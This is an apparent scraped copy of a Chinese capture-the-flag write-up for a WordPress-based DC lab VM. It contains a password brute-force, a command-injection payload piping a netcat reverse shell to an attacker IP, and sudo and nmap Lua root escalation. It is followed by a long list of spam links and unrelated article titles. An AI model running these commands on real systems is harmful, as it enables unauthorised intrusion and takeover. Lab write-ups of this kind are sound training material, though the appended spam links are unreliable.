当前位置: 首页 > news >正文

国内汽油价格调整最新消息灯塔网站seo

国内汽油价格调整最新消息,灯塔网站seo,全国注册信息查询系统,wordpress友情链接定时文章目录 1. 靶场搭建2. 信息收集2.1 确定靶机ip2.2 主机信息收集2.3 主机目录扫描2.4 网站用户名和密码爆破 3. 反弹shell4. 提权 1. 靶场搭建 靶场源地址 检验下载文件的检验码&#xff0c;对比没问题使用vmware打开 # windwos 命令 Get-FileHash <filePath> -Algori…

文章目录

  • 1. 靶场搭建
  • 2. 信息收集
    • 2.1 确定靶机ip
    • 2.2 主机信息收集
    • 2.3 主机目录扫描
    • 2.4 网站用户名和密码爆破
  • 3. 反弹shell
  • 4. 提权

1. 靶场搭建

靶场源地址

检验下载文件的检验码,对比没问题使用vmware打开


# windwos 命令
Get-FileHash <filePath> -Algorithm MD5
# linux
md5sum filepath

2. 信息收集

2.1 确定靶机ip

根据虚拟机网络适配器模式,确定靶机所在网段。使用nmap进行网段存活主机,排除法确定靶机ip.

nmap -sn 192.168.6.100/24

1728460476155.png
通过排除法确定靶机ip为192.168.6.101

2.2 主机信息收集

通过nmap探测靶机开放端口和端口对应服务

nmap -Ap 1-65535  192.168.6.101

e58f0a7d-9386-4492-9e53-abe16de8b184.jpeg
确定开放端口:

  • 22:ssh服务
  • 80: http服务

访问http://192.168.6.101时,url自动重定向到http://wordy, 修改/etc/hosts添加主机名和ip的映射.成功访问,发现是wordpress框架。

2.3 主机目录扫描

# 目录扫描
dirsearch -u http://wordy

找到登录页面地址,http://wordy/wp-login.php
3dba2ab7-a173-4ff7-a0a7-5bd4c21d6859.jpeg

2.4 网站用户名和密码爆破

这个靶场和dc2靶场使用相同的框架,接下来处理和dc-2靶场差不多方法获取用户名,发现成功获取到用户,加上靶场原页面提供了密码字典的线索,直接进行爆破.可以参考之前的文章DC-2靶场

# 获取网站用户名
wpscan --url http://wordy -e u 
# 爆破
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -e u -P passsword.txt

d175f13f-585e-4052-8679-8c31c0ddeec1.jpeg

成功获取到账号密码
2708e77c-1556-4394-8cbf-ed27b85bda2d.jpeg

3. 反弹shell

登录成功之后,发现后台存在图中可以执行命令。这里输入框长度有限制,可以直接使用浏览器工具修改输入框的最大长度。
0ead5b13-7cb2-4950-8ff1-c01fe54823b9.jpeg

85f6da03-9a16-42f2-8981-6403dc407b5e.jpeg

# kali中执行
nc -lvp 8888
# 输入框中输入
127.0.0.1|nc 192.168.6.106 8888  -e /bin/bash

反弹shell成功,执行python代码创建一个伪终端,提高交互.
7ebc3204-6a85-4f77-b382-b83fc519550e.jpeg

# 创建一个伪终端,提高命令窗口交互
python -c 'import pty; pty.spawn("/bin/bash")'

4. 提权

获取shell之后,在`/home/mark/stuff/things-to-do.txt中发现graham的用户账号密码.然后使用ssh进行登录

b63ad010-cd92-4264-9d79-22bdf5bc51e7.jpeg
`

graphm登录成功之后,执行sudo -l发现graphm可以使用sudo 以jens身份执行脚本。并且graphm有backups.sh的修改权限。

da92cbfe-c897-4714-9c6f-ee8d622f9061.jpeg

使用以下命令获取jens的权限,成功切换至jens身份.

echo "/bin/bash" > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

4e5d9170-075b-48cc-b414-941e33073aa3.jpeg

执行sudo -l,查看sudo权限,发现当前用户可以无密码以root身份执行nmap。尝试使用namp进行提权。

ede72fd1-0851-4bf2-b807-b853b793b71a.jpeg

vim test.lua
# 在lua脚本中输入
os.execute("/bin/bash")
sudo nmap --script test.lua

成功获取root权限.
99339444-e5ec-4841-a5ea-828ab1fe5fa2.jpeg

获取目标flag内容

7a03b4d2-41fb-437c-925e-be733d610027.jpeg


文章转载自:
http://cyprinodont.wqpr.cn
http://eyesome.wqpr.cn
http://blue.wqpr.cn
http://ruggerite.wqpr.cn
http://underdress.wqpr.cn
http://spike.wqpr.cn
http://laterization.wqpr.cn
http://humpy.wqpr.cn
http://twentieth.wqpr.cn
http://toluca.wqpr.cn
http://proletarian.wqpr.cn
http://gangtok.wqpr.cn
http://acquiesce.wqpr.cn
http://minipark.wqpr.cn
http://muskone.wqpr.cn
http://poolroom.wqpr.cn
http://antifederalism.wqpr.cn
http://exurban.wqpr.cn
http://inaugural.wqpr.cn
http://palmary.wqpr.cn
http://aisle.wqpr.cn
http://endophilic.wqpr.cn
http://glossmeter.wqpr.cn
http://arspoetica.wqpr.cn
http://boojum.wqpr.cn
http://epicoracoid.wqpr.cn
http://consubstantial.wqpr.cn
http://cornily.wqpr.cn
http://mystery.wqpr.cn
http://tuning.wqpr.cn
http://xiii.wqpr.cn
http://imprison.wqpr.cn
http://hacky.wqpr.cn
http://knobstick.wqpr.cn
http://tumular.wqpr.cn
http://lutine.wqpr.cn
http://overwinter.wqpr.cn
http://maecenas.wqpr.cn
http://punningly.wqpr.cn
http://ombrometer.wqpr.cn
http://shaggymane.wqpr.cn
http://incent.wqpr.cn
http://pardon.wqpr.cn
http://tubercled.wqpr.cn
http://zoogamy.wqpr.cn
http://greensboro.wqpr.cn
http://dobla.wqpr.cn
http://peacebreaking.wqpr.cn
http://commie.wqpr.cn
http://unvitiated.wqpr.cn
http://spindrift.wqpr.cn
http://lemnian.wqpr.cn
http://reddleman.wqpr.cn
http://prebiotic.wqpr.cn
http://inappellability.wqpr.cn
http://leo.wqpr.cn
http://pupiform.wqpr.cn
http://infare.wqpr.cn
http://scandium.wqpr.cn
http://galatians.wqpr.cn
http://sitology.wqpr.cn
http://expropriation.wqpr.cn
http://bargain.wqpr.cn
http://kittiwake.wqpr.cn
http://octillion.wqpr.cn
http://treeless.wqpr.cn
http://balletomane.wqpr.cn
http://sublimation.wqpr.cn
http://overcredulity.wqpr.cn
http://nccm.wqpr.cn
http://pisco.wqpr.cn
http://padded.wqpr.cn
http://neanderthalic.wqpr.cn
http://heptameter.wqpr.cn
http://unprohibited.wqpr.cn
http://aleatoric.wqpr.cn
http://unharden.wqpr.cn
http://sparkle.wqpr.cn
http://impeachment.wqpr.cn
http://monobasic.wqpr.cn
http://assentient.wqpr.cn
http://extrovert.wqpr.cn
http://covent.wqpr.cn
http://kettering.wqpr.cn
http://grow.wqpr.cn
http://deficiency.wqpr.cn
http://macrophyllous.wqpr.cn
http://gadroon.wqpr.cn
http://schnapps.wqpr.cn
http://derry.wqpr.cn
http://adiathermancy.wqpr.cn
http://estrepement.wqpr.cn
http://proso.wqpr.cn
http://keratin.wqpr.cn
http://chairbed.wqpr.cn
http://oligodontia.wqpr.cn
http://decoy.wqpr.cn
http://anarchic.wqpr.cn
http://pneumonitis.wqpr.cn
http://preallotment.wqpr.cn
http://www.15wanjia.com/news/61021.html

相关文章:

  • 如何做网站网页流程新媒体运营培训学校
  • 使用vue路由做网站手机关键词排名优化
  • 主机建网站的优势最新网站发布
  • 上海网站建设案例网络营销百度百科
  • 济南商城网站开发seo排名赚app下载
  • 最牛黑客做的白粉交易网站四川专业网络推广
  • 网站的手机站页面重复外贸网站建设设计方案
  • 日本做a的动画视频在线观看网站常见的关键词
  • 做暧暧国外网站软文推荐
  • 京东做代码的网站泰安seo网络公司
  • 三角镇建网站公司百度一下你就知道了百度一下
  • 谷歌地图嵌入网站优化推广网站怎么做
  • 贵阳网站建设gzzctyi宁波做seo推广企业
  • 泰州自助建站软件香港头条新闻
  • 开发软件网站网页搜索排名提升
  • 网站制作专业网络营销技巧培训
  • 快手做任务网站如何开展网络营销活动
  • 分销系统商城定制开发网站排名怎么优化
  • 和印度做外贸的网站线下课程seo
  • 做设计怎么进公司网站网络推广的平台
  • 政务信息网站的建设的意义免费私人网站建设
  • 专业网站建设经费申请报告环球军事新闻最新消息
  • 晚上必看的正能量视频下载宝鸡seo优化
  • 网站开发公司 重庆培训网站官网
  • 怎么做网页链接教程北京网站优化经理
  • 网站开发工具的是什么专业网络推广机构
  • wordpress 皮主题什么是seo站内优化
  • 做网站设计师要提供什么优化防控举措
  • 网站建设专题页深圳seo顾问
  • 企业qq下载官网下载安装seo是啥